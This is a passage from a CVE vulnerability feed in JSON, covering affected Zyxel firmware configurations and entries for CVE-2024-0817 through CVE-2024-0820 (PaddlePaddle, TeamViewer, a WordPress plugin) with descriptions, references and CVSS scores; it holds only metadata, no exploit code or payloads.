"vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:zyxel:dx3300-t1:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:zyxel:dx3301-t0_firmware:5.50\\(aby.4\\)c0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:zyxel:dx3301-t0:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:zyxel:dx4510_firmware:5.17\\(abyl.6\\)c0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:zyxel:dx4510:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:zyxel:dx5401-b0_firmware:5.17\\(abyo.5\\)c0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:zyxel:dx5401-b0:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:zyxel:dx5401-b1_firmware:5.17\\(abyo.5\\)c0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:zyxel:dx5401-b1:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:zyxel:emg3525-t50b_firmware:5.50\\(abpm.8\\)c0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:zyxel:emg3525-t50b:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:zyxel:emg5523-t50b_firmware:5.50\\(abpm.8\\)c0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:zyxel:emg5523-t50b:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:zyxel:emg5723-t50k_firmware:5.50\\(abom.8.2\\)c0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:zyxel:emg5723-t50k:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:zyxel:ex3300-t1_firmware:5.50\\(aby.4\\)c0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:zyxel:ex3300-t1:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:zyxel:ex3301-t0_firmware:5.50\\(aby.4\\)c0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:zyxel:ex3301-t0:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:zyxel:ex3320-t0_firmware:5.71\\(yak.2\\)d0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:zyxel:ex3320-t0:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:zyxel:ex3320-t1_firmware:5.71\\(yap.0\\)c0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:zyxel:ex3320-t1:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:zyxel:ex3500-t0_firmware:5.44\\(achr.0\\)c0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:zyxel:ex3500-t0:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:zyxel:ex3501-t0_firmware:5.44\\(achr.0\\)c0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:zyxel:ex3501-t0:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:zyxel:ex3510_firmware:5.17\\(abup.11\\)c0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:zyxel:ex3510:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:zyxel:ex5401-b0_firmware:5.17\\(abyo.5\\)c0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:zyxel:ex5401-b0:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:zyxel:ex5401-b1_firmware:5.17\\(abyo.5\\)c0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:zyxel:ex5401-b1:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:zyxel:ex5501-b0_firmware:5.17\\(abry.4\\)c0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:zyxel:ex5501-b0:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:zyxel:ex5510_firmware:5.17\\(abqx.9\\)c0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:zyxel:ex5510:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:zyxel:ex5512-t0_firmware:5.70\\(aceg.2\\)c0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:zyxel:ex5512-t0:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:zyxel:ex5600-t1_firmware:5.70\\(acdz.2\\)c0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:zyxel:ex5600-t1:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:zyxel:ex5601-t0_firmware:5.70\\(acdz.2\\)c0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:zyxel:ex5601-t0:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:zyxel:ex5601-t1_firmware:5.70\\(acdz.2\\)c0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:zyxel:ex5601-t1:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:zyxel:ex7710-b0_firmware:5.18\\(acak.0\\)c0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:zyxel:ex7710-b0:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:zyxel:vmg3625-t50b_firmware:5.50\\(abpm.8\\)c0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:zyxel:vmg3625-t50b:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:zyxel:vmg3927-t50k_firmware:5.50\\(abom.8.2\\)c0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:zyxel:vmg3927-t50k:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:zyxel:vmg4005-b50a_firmware:5.17\\(abqa.2\\)c0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:zyxel:vmg4005-b50a:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:zyxel:vmg4005-b60a_firmware:5.17\\(abqa.2\\)c0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:zyxel:vmg4005-b60a:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:zyxel:vmg8623-t50b_firmware:5.50\\(abpm.8\\)c0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:zyxel:vmg8623-t50b:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:zyxel:vmg8825-t50k_firmware:5.50\\(abom.8.2\\)c0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:zyxel:vmg8825-t50k:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:zyxel:ax7501-b0_firmware:5.17\\(abpc.4\\)c0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:zyxel:ax7501-b0:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:zyxel:ax7501-b1_firmware:5.17\\(abpc.4\\)c0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:zyxel:ax7501-b1:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:zyxel:pm3100-t0_firmware:5.42\\(acbf.1.2\\)c0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:zyxel:pm3100-t0:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:zyxel:pm5100-t0_firmware:5.42\\(acbf.1.2\\)c0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:zyxel:pm5100-t0:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:zyxel:pm7300-t0_firmware:5.42\\(abyy.1\\)c0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:zyxel:pm7300-t0:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:zyxel:px3321-t1_firmware:5.44\\(acjb.0\\)c0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:zyxel:px3321-t1:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:zyxel:wx3100-t0_firmware:5.50\\(abl.3\\)c0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:zyxel:wx3100-t0:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:zyxel:wx3401-b0_firmware:5.17\\(abe.2\\)c0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:zyxel:wx3401-b0:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:zyxel:wx5600-t0_firmware:5.70\\(acdz.2\\)c0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:zyxel:wx5600-t0:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:zyxel:wx5610-b0_firmware:5.18\\(acgj.0\\)c0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:zyxel:wx5610-b0:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:zyxel:nbg7510_firmware:1.00\\(abzy.6\\)c0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:zyxel:nbg7510:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { }, "publishedDate" : "2024-05-21T02:15Z", "lastModifiedDate" : "2025-01-22T22:58Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0817", "ASSIGNER" : "security@huntr.dev" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://huntr.com/bounties/44d5cbd9-a046-417b-a8d4-bea6fda9cbe3", "name" : "https://huntr.com/bounties/44d5cbd9-a046-417b-a8d4-bea6fda9cbe3", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://huntr.com/bounties/44d5cbd9-a046-417b-a8d4-bea6fda9cbe3", "name" : "https://huntr.com/bounties/44d5cbd9-a046-417b-a8d4-bea6fda9cbe3", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Command injection in IrGraph.draw in paddlepaddle/paddle 2.6.0" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:paddlepaddle:paddlepaddle:2.6.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-03-07T02:15Z", "lastModifiedDate" : "2025-01-19T02:26Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0818", "ASSIGNER" : "security@huntr.dev" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://huntr.com/bounties/85b06a1b-ac0b-4096-a06d-330891570cd9", "name" : "https://huntr.com/bounties/85b06a1b-ac0b-4096-a06d-330891570cd9", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://huntr.com/bounties/85b06a1b-ac0b-4096-a06d-330891570cd9", "name" : "https://huntr.com/bounties/85b06a1b-ac0b-4096-a06d-330891570cd9", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Arbitrary File Overwrite Via Path Traversal in paddlepaddle/paddle before 2.6" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:paddlepaddle:paddlepaddle:*:*:*:*:*:*:*:*", "versionEndExcluding" : "2.6.0", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.1, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.2 } }, "publishedDate" : "2024-03-07T13:15Z", "lastModifiedDate" : "2025-01-23T18:50Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0819", "ASSIGNER" : "psirt@teamviewer.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.teamviewer.com/en/trust-center/security-bulletins/tv-2024-1001/", "name" : "https://www.teamviewer.com/en/trust-center/security-bulletins/tv-2024-1001/", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://www.teamviewer.com/en/trust-center/security-bulletins/tv-2024-1001/", "name" : "https://www.teamviewer.com/en/trust-center/security-bulletins/tv-2024-1001/", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "\nImproper initialization of default settings in TeamViewer Remote Client prior version 15.51.5 for Windows, Linux and macOS, allow a low privileged user to elevate privileges by changing the personal password setting and establishing a remote connection to a logged-in admin account.\n\n" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:teamviewer:remote:*:*:*:*:*:*:*:*", "versionEndExcluding" : "15.51.5", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-02-27T14:15Z", "lastModifiedDate" : "2025-03-03T22:44Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0820", "ASSIGNER" : "contact@wpscan.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://wpscan.com/vulnerability/fc091bbd-7338-4bd4-add5-e46502a9a949/", "name" : "https://wpscan.com/vulnerability/fc091bbd-7338-4bd4-add5-e46502a9a949/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://wpscan.com/vulnerability/fc091bbd-7338-4bd4-add5-e46502a9a949/", "name" : "https://wpscan.com/vulnerability/fc091bbd-7338-4bd4-add5-e46502a9a949/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Jobs for WordPress plugin before 2.7.4 does not sanitise and escape some parameters, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:blueglass:jobs_for_wordpress:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "2.7.4", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.3, "impactScore" : 2.7 } }, "publishedDate" : "2024-03-18T19:15Z", "lastModifiedDate" : "2025-03-28T20:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0821", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3037232%40cost-of-goods-for-woocommerce&new=3037232%40cost-of-goods-for-woocommerce&sfp_email=&sfph_mail=", "name" : 